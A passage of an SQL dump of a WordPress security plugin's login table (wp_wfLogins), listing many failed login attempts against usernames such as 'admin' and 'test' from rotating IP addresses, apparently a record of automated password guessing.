(102347, 1498626401.351600, 1, 'loginFailValidUsername', 'admin', 1, 1540281015, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102348, 1498626402.373606, 1, 'loginFailValidUsername', 'admin', 1, 1540281015, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102349, 1498628480.132301, 1, 'loginFailValidUsername', 'admin', 1, 2944382474, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102350, 1498628481.605591, 1, 'loginFailValidUsername', 'admin', 1, 2944382474, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102351, 1498630310.114501, 1, 'loginFailValidUsername', 'admin', 1, 1887825675, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102352, 1498630311.585040, 1, 'loginFailValidUsername', 'admin', 1, 1887825675, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102353, 1498633028.693905, 1, 'loginFailValidUsername', 'admin', 1, 3671480802, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102354, 1498633030.328807, 1, 'loginFailValidUsername', 'admin', 1, 3671480802, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102355, 1498636115.747338, 1, 'loginFailValidUsername', 'admin', 1, 1422096801, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102356, 1498636116.784364, 1, 'loginFailValidUsername', 'admin', 1, 1422096801, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102357, 1498640849.061543, 1, 'loginFailValidUsername', 'admin', 1, 627695844, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102358, 1498640850.623857, 1, 'loginFailValidUsername', 'admin', 1, 627695844, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102359, 1498643875.588148, 1, 'loginFailValidUsername', 'admin', 1, 3276546481, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102360, 1498643876.798761, 1, 'loginFailValidUsername', 'admin', 1, 3276546481, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102361, 1498644716.408975, 1, 'loginFailValidUsername', 'admin', 1, 1046105368, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102362, 1498644717.484357, 1, 'loginFailValidUsername', 'admin', 1, 1046105368, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102363, 1498644940.190462, 1, 'loginFailValidUsername', 'admin', 1, 656968908, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102364, 1498644941.645399, 1, 'loginFailValidUsername', 'admin', 1, 656968908, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102365, 1498645111.428206, 1, 'loginFailValidUsername', 'admin', 1, 2047384482, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102366, 1498645112.699972, 1, 'loginFailValidUsername', 'admin', 1, 2047384482, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102367, 1498645982.108344, 1, 'loginFailValidUsername', 'admin', 1, 1768625648, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102368, 1498645986.747734, 1, 'loginFailValidUsername', 'admin', 1, 1768625648, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102369, 1498648260.072504, 1, 'loginFailValidUsername', 'admin', 1, 996240175, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102370, 1498648262.358459, 1, 'loginFailValidUsername', 'admin', 1, 996240175, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102371, 1498652206.358432, 1, 'loginFailValidUsername', 'admin', 1, 3411510666, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102372, 1498652208.002624, 1, 'loginFailValidUsername', 'admin', 1, 3411510666, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102373, 1498652672.952715, 1, 'loginFailValidUsername', 'admin', 1, 2961990561, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102374, 1498652673.985579, 1, 'loginFailValidUsername', 'admin', 1, 2961990561, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102375, 1498654465.631309, 1, 'loginFailValidUsername', 'admin', 1, 1773706418, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102376, 1498654466.985643, 1, 'loginFailValidUsername', 'admin', 1, 1773706418, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102377, 1498660328.673319, 1, 'loginFailValidUsername', 'admin', 1, 3047297516, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102378, 1498660330.097509, 1, 'loginFailValidUsername', 'admin', 1, 3047297516, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102379, 1498665421.135244, 1, 'loginFailValidUsername', 'admin', 1, 1485079094, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102380, 1498665422.166740, 1, 'loginFailValidUsername', 'admin', 1, 1485079094, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102381, 1498665465.459857, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1539836950, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/535.10.67 (KHTML, like Gecko) Chrome/53.6.0992.5620 Safari/534.50'),
(102382, 1498667444.600617, 1, 'loginFailValidUsername', 'admin', 1, 2762002450, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102383, 1498667448.245292, 1, 'loginFailValidUsername', 'admin', 1, 2762002450, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102384, 1498670628.795583, 1, 'loginFailValidUsername', 'admin', 1, 532327828, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102385, 1498670630.694565, 1, 'loginFailValidUsername', 'admin', 1, 532327828, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102386, 1498671023.056899, 1, 'loginFailValidUsername', 'admin', 1, 1133404225, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102387, 1498673416.461168, 1, 'loginFailValidUsername', 'admin', 1, 3036568532, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102388, 1498673418.904772, 1, 'loginFailValidUsername', 'admin', 1, 3036568532, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102389, 1498676803.391858, 1, 'loginFailValidUsername', 'admin', 1, 2057456199, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102390, 1498676804.817681, 1, 'loginFailValidUsername', 'admin', 1, 2057456199, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102391, 1498679690.034125, 1, 'loginFailValidUsername', 'admin', 1, 2972444966, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102392, 1498679691.356498, 1, 'loginFailValidUsername', 'admin', 1, 2972444966, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102393, 1498681340.372706, 1, 'loginFailValidUsername', 'admin', 1, 2970133445, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102394, 1498681341.909259, 1, 'loginFailValidUsername', 'admin', 1, 2970133445, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102395, 1498682636.938534, 1, 'loginFailValidUsername', 'admin', 1, 690199419, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102396, 1498682645.189610, 1, 'loginFailValidUsername', 'admin', 1, 690199419, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102397, 1498688460.233047, 1, 'loginFailValidUsername', 'admin', 1, 2970975037, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102398, 1498688607.035809, 1, 'loginFailValidUsername', 'admin', 1, 2204950530, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102399, 1498688608.663611, 1, 'loginFailValidUsername', 'admin', 1, 2204950530, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102400, 1498689301.650388, 1, 'loginFailValidUsername', 'admin', 1, 3185120017, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102401, 1498690202.664396, 1, 'loginFailInvalidUsername', 'pour', 0, 3105930270, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102402, 1498690858.193113, 1, 'loginFailValidUsername', 'pablo', 3, 3497117403, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102403, 1498690860.017046, 1, 'loginFailInvalidUsername', 'vous', 0, 3497117403, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102404, 1498690861.806926, 1, 'loginFailInvalidUsername', 'training', 0, 3497117403, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102405, 1498690863.746675, 1, 'loginFailInvalidUsername', 'notre', 0, 3497117403, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102406, 1498690865.551388, 1, 'loginFailInvalidUsername', 'pour', 0, 3497117403, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102407, 1498690867.788825, 1, 'loginFailInvalidUsername', 'cross', 0, 3497117403, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1');
INSERT INTO `wp_wfLogins` (`id`, `ctime`, `fail`, `action`, `username`, `userID`, `IP`, `UA`) VALUES
(102408, 1498690869.611103, 1, 'loginFailInvalidUsername', 'objectifs', 0, 3497117403, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102409, 1498690871.454729, 1, 'loginFailInvalidUsername', 'venez', 0, 3497117403, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102410, 1498690873.465881, 1, 'loginFailInvalidUsername', 'outils', 0, 3497117403, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102411, 1498690875.468181, 1, 'loginFailInvalidUsername', 'professionnel', 0, 3497117403, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102412, 1498691064.397826, 1, 'loginFailValidUsername', 'admin', 1, 1096590283, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102413, 1498691065.454086, 1, 'loginFailValidUsername', 'admin', 1, 1096590283, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102414, 1498691319.089167, 1, 'loginFailValidUsername', 'admin', 1, 634530697, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102415, 1498691320.348231, 1, 'loginFailValidUsername', 'admin', 1, 634530697, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102416, 1498697011.708554, 1, 'loginFailValidUsername', 'admin', 1, 3135207294, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102417, 1498833916.722565, 1, 'loginFailInvalidUsername', 'test', 0, 2058679530, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102418, 1498833918.515638, 1, 'loginFailInvalidUsername', 'test', 0, 2058679530, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102419, 1498834235.045565, 1, 'loginFailInvalidUsername', 'test', 0, 2374447927, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102420, 1498834236.183964, 1, 'loginFailInvalidUsername', 'test', 0, 2374447927, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102421, 1498836670.163088, 1, 'loginFailInvalidUsername', 'test', 0, 3553507500, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102422, 1498836672.195536, 1, 'loginFailInvalidUsername', 'test', 0, 3553507500, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102423, 1498837594.295691, 1, 'loginFailInvalidUsername', 'test', 0, 3187941058, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102424, 1498837598.896228, 1, 'loginFailInvalidUsername', 'test', 0, 3187941058, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102425, 1498837972.160743, 1, 'loginFailInvalidUsername', 'test', 0, 2945059508, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102426, 1498837973.648749, 1, 'loginFailInvalidUsername', 'test', 0, 2945059508, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102427, 1498839943.265660, 1, 'loginFailInvalidUsername', 'test', 0, 3070175989, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102428, 1498839945.269605, 1, 'loginFailInvalidUsername', 'test', 0, 3070175989, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102429, 1498841036.794261, 1, 'loginFailInvalidUsername', 'test', 0, 1329042672, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102430, 1498842246.481495, 1, 'loginFailInvalidUsername', 'test', 0, 3583325044, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102431, 1498842247.450331, 1, 'loginFailInvalidUsername', 'test', 0, 3583325044, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102432, 1498842872.460232, 1, 'loginFailInvalidUsername', 'test', 0, 3075731299, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102433, 1498842873.681472, 1, 'loginFailInvalidUsername', 'test', 0, 3075731299, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102434, 1498844547.589649, 1, 'loginFailInvalidUsername', 'test', 0, 1329981114, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102435, 1498844549.082372, 1, 'loginFailInvalidUsername', 'test', 0, 1329981114, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102436, 1498845067.945971, 1, 'loginFailInvalidUsername', 'test', 0, 1423699707, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102437, 1498845068.932858, 1, 'loginFailInvalidUsername', 'test', 0, 1423699707, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102438, 1498849617.423562, 1, 'loginFailInvalidUsername', 'test', 0, 1240557990, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102439, 1498849618.719688, 1, 'loginFailInvalidUsername', 'test', 0, 1240557990, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102440, 1498849872.169094, 1, 'loginFailInvalidUsername', 'test', 0, 1267688388, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102441, 1498849873.298811, 1, 'loginFailInvalidUsername', 'test', 0, 1267688388, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102442, 1498852588.333825, 1, 'loginFailValidUsername', 'admin', 1, 1755459842, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102443, 1498852589.409323, 1, 'loginFailValidUsername', 'admin', 1, 1755459842, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102444, 1498854031.377332, 1, 'loginFailInvalidUsername', 'test', 0, 3315981465, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102445, 1498854073.795202, 1, 'loginFailInvalidUsername', 'test', 0, 1441124516, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102446, 1498854739.700527, 1, 'loginFailInvalidUsername', 'test', 0, 1849098465, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102447, 1498854741.830816, 1, 'loginFailInvalidUsername', 'test', 0, 1849098465, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102448, 1498854753.479541, 1, 'loginFailInvalidUsername', 'test', 0, 737914786, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102449, 1498854754.997522, 1, 'loginFailInvalidUsername', 'test', 0, 737914786, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102450, 1498856621.313104, 1, 'loginFailInvalidUsername', 'test', 0, 2908458748, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102451, 1498856622.700981, 1, 'loginFailInvalidUsername', 'test', 0, 2908458748, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102452, 1498856623.842255, 1, 'loginFailInvalidUsername', 'test', 0, 3145684820, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102453, 1498856625.332395, 1, 'loginFailInvalidUsername', 'test', 0, 3145684820, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102454, 1498856875.297914, 1, 'loginFailInvalidUsername', 'test', 0, 778261166, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102455, 1498856876.259537, 1, 'loginFailInvalidUsername', 'test', 0, 778261166, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102456, 1498857431.107553, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1539836950, 'Mozilla/5.0 (Windows NT 5.0) AppleWebKit/532.88.35 (KHTML, like Gecko) Version/5.3.7 Safari/530.70'),
(102457, 1498867243.445853, 1, 'loginFailInvalidUsername', 'test', 0, 2577632674, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102458, 1498867244.991678, 1, 'loginFailInvalidUsername', 'test', 0, 2577632674, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102459, 1498868601.199881, 1, 'loginFailInvalidUsername', 'test', 0, 2963878449, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102460, 1498870628.204936, 1, 'loginFailInvalidUsername', 'test', 0, 3566655098, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102461, 1498870643.505292, 1, 'loginFailInvalidUsername', 'test', 0, 3566655098, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102462, 1498874972.062605, 1, 'loginFailInvalidUsername', 'test', 0, 3321294276, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102463, 1498874975.709285, 1, 'loginFailInvalidUsername', 'test', 0, 3321294276, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102464, 1498876860.061770, 1, 'loginFailInvalidUsername', 'test', 0, 3754817706, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102465, 1498876861.655739, 1, 'loginFailInvalidUsername', 'test', 0, 3754817706, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102466, 1498879565.494904, 1, 'loginFailInvalidUsername', 'test', 0, 2094473799, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102467, 1498883265.950297, 1, 'loginFailInvalidUsername', 'test', 0, 1776434590, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102468, 1498883267.453622, 1, 'loginFailInvalidUsername', 'test', 0, 1776434590, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102469, 1498884446.562962, 1, 'loginFailInvalidUsername', 'test', 0, 657088345, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102470, 1498884924.412673, 1, 'loginFailInvalidUsername', 'test', 0, 2898773830, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102471, 1498888306.309333, 1, 'loginFailInvalidUsername', 'test', 0, 657761155, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102472, 1498888307.711233, 1, 'loginFailInvalidUsername', 'test', 0, 657761155, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102473, 1498888960.379149, 1, 'loginFailInvalidUsername', 'test', 0, 2017199584, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102474, 1498888961.598289, 1, 'loginFailInvalidUsername', 'test', 0, 2017199584, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102475, 1498892197.772720, 1, 'loginFailInvalidUsername', 'test', 0, 3057766743, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102476, 1498892199.006866, 1, 'loginFailInvalidUsername', 'test', 0, 3057766743, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102477, 1498892447.517584, 1, 'loginFailInvalidUsername', 'test', 0, 1950958695, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102478, 1498892450.583994, 1, 'loginFailInvalidUsername', 'test', 0, 1950958695, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102479, 1498892541.320832, 1, 'loginFailInvalidUsername', 'test', 0, 1892205055, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102480, 1498892543.122016, 1, 'loginFailInvalidUsername', 'test', 0, 1892205055, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102481, 1498892634.073522, 1, 'loginFailInvalidUsername', 'test', 0, 1023600493, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102482, 1498892635.670287, 1, 'loginFailInvalidUsername', 'test', 0, 1023600493, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102483, 1498894925.036681, 1, 'loginFailInvalidUsername', 'test', 0, 461507676, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102484, 1498894926.711254, 1, 'loginFailInvalidUsername', 'test', 0, 461507676, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102485, 1498897342.826897, 1, 'loginFailInvalidUsername', 'test', 0, 3381475055, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102486, 1498897344.124940, 1, 'loginFailInvalidUsername', 'test', 0, 3381475055, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102487, 1498897793.045459, 1, 'loginFailInvalidUsername', 'test', 0, 3134639215, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102488, 1498897794.428281, 1, 'loginFailInvalidUsername', 'test', 0, 3134639215, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102489, 1498900870.311419, 1, 'loginFailInvalidUsername', 'test', 0, 1452261118, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102490, 1498901564.989569, 1, 'loginFailInvalidUsername', 'test', 0, 2076796947, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102491, 1498901566.215136, 1, 'loginFailInvalidUsername', 'test', 0, 2076796947, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102492, 1498902421.016520, 1, 'loginFailInvalidUsername', 'test', 0, 694234475, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102493, 1498904315.622748, 1, 'loginFailInvalidUsername', 'test', 0, 2058189926, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102494, 1498904317.183801, 1, 'loginFailInvalidUsername', 'test', 0, 2058189926, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102495, 1498904841.151801, 1, 'loginFailValidUsername', 'admin', 1, 1539836950, 'Mozilla/5.0 (Windows NT 5.0) AppleWebKit/533.91.38 (KHTML, like Gecko) Version/5.3.8 Safari/531.73'),
(102496, 1498904842.605162, 1, 'loginFailInvalidUsername', 'test', 0, 1848588273, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102497, 1498904844.058418, 1, 'loginFailInvalidUsername', 'test', 0, 1848588273, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
